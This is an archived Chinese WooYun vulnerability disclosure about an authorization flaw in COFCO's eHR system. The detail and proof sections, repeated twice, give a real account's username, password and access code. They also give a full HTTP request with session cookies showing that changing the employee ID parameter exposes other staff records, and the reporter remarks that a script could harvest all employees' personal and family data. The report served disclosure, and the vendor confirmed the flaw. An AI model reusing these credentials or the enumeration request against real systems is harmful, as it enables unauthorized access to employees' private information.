中粮某严重逻辑漏洞导致所有员工信息泄露

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0133110

漏洞标题：中粮某严重逻辑漏洞导致所有员工信息泄露

漏洞作者：路人甲

提交时间：2015-08-10 16:28

修复时间：2015-09-24 17:14

公开时间：2015-09-24 17:14

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-10：细节已通知厂商并且等待厂商处理中
2015-08-10：厂商已经确认，细节仅向厂商公开
2015-08-20：细节向核心白帽子及相关领域专家公开
2015-08-30：细节向普通白帽子公开
2015-09-09：细节向实习白帽子公开
2015-09-24：细节向公众公开

简要描述：

中粮某严重逻辑漏洞导致所有员工信息泄露

详细说明：

之前很久以前跑到一个弱口令帐号，因为工作太忙一直没有时间再进展，主要是自己懒。
ehr.cofco.com
用户名：leixingen
密码：leixingen123
开放码：4256zx

GET /datcllct/personInfoEditData.do?setId=A001&flag=1&fk=40095661&type=0 HTTP/1.1

fk=40095661，我们修改成4095666试试

GET /datcllct/personInfoEditData.do?setId=A001&flag=1&fk=40095666&type=0 HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://ehr.cofco.com/logonData.do#
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; GWX:RESERVED)
Accept-Encoding: gzip, deflate
Host: ehr.cofco.com
Proxy-Connection: Keep-Alive
Cookie: td_cookie=2530686; COFCO_C3_LOGIN=JOalhHAIjzZgUlJnDgE435SULZhJYuExh3C29ieLAeFY5Ai47cZ%2F2Y0gPfxYG4cV; COFCO_C3_JAVA=C0-AE-B7-B4-4C-8F-5C-5E-93-CD-44-D1-9F-EB-B7-09-72-23-4A-84-05-A0-3B-01-D9-58-58-E9-EF-85-AC-04-51-8B-13-66-73-B6-CA-14-30-16-79-93-9D-D7-6E-FF; JSESSIONID=VLcl2F3pZLZtyLFfR6Qkf2cTcLQ8NJh7zhXyFRBpd3dPzkytJ9GH!1040793581

写个脚本，保存为html基本上可以把全员个人信息抓出来了，这个系统的信息还是比较全的，父母信息和学校之类的也会有。

漏洞证明：

之前很久以前跑到一个弱口令帐号，因为工作太忙一直没有时间再进展，主要是自己懒。
ehr.cofco.com
用户名：leixingen
密码：leixingen123
开放码：4256zx

GET /datcllct/personInfoEditData.do?setId=A001&flag=1&fk=40095661&type=0 HTTP/1.1

fk=40095661，我们修改成4095666试试

GET /datcllct/personInfoEditData.do?setId=A001&flag=1&fk=40095666&type=0 HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://ehr.cofco.com/logonData.do#
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; GWX:RESERVED)
Accept-Encoding: gzip, deflate
Host: ehr.cofco.com
Proxy-Connection: Keep-Alive
Cookie: td_cookie=2530686; COFCO_C3_LOGIN=JOalhHAIjzZgUlJnDgE435SULZhJYuExh3C29ieLAeFY5Ai47cZ%2F2Y0gPfxYG4cV; COFCO_C3_JAVA=C0-AE-B7-B4-4C-8F-5C-5E-93-CD-44-D1-9F-EB-B7-09-72-23-4A-84-05-A0-3B-01-D9-58-58-E9-EF-85-AC-04-51-8B-13-66-73-B6-CA-14-30-16-79-93-9D-D7-6E-FF; JSESSIONID=VLcl2F3pZLZtyLFfR6Qkf2cTcLQ8NJh7zhXyFRBpd3dPzkytJ9GH!1040793581

写个脚本，保存为html基本上可以把全员个人信息抓出来了，这个系统的信息还是比较全的，父母信息和学校之类的也会有。

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-08-10 17:13

厂商回复：

非常感谢！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0133110

漏洞标题：中粮某严重逻辑漏洞导致所有员工信息泄露

相关厂商：中粮集团有限公司

漏洞作者：路人甲

提交时间：2015-08-10 16:28

修复时间：2015-09-24 17:14

公开时间：2015-09-24 17:14

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0133110

漏洞标题：中粮某严重逻辑漏洞导致所有员工信息泄露

相关厂商：中粮集团有限公司

漏洞作者： 路人甲

提交时间：2015-08-10 16:28

修复时间：2015-09-24 17:14

公开时间：2015-09-24 17:14

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0133110"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云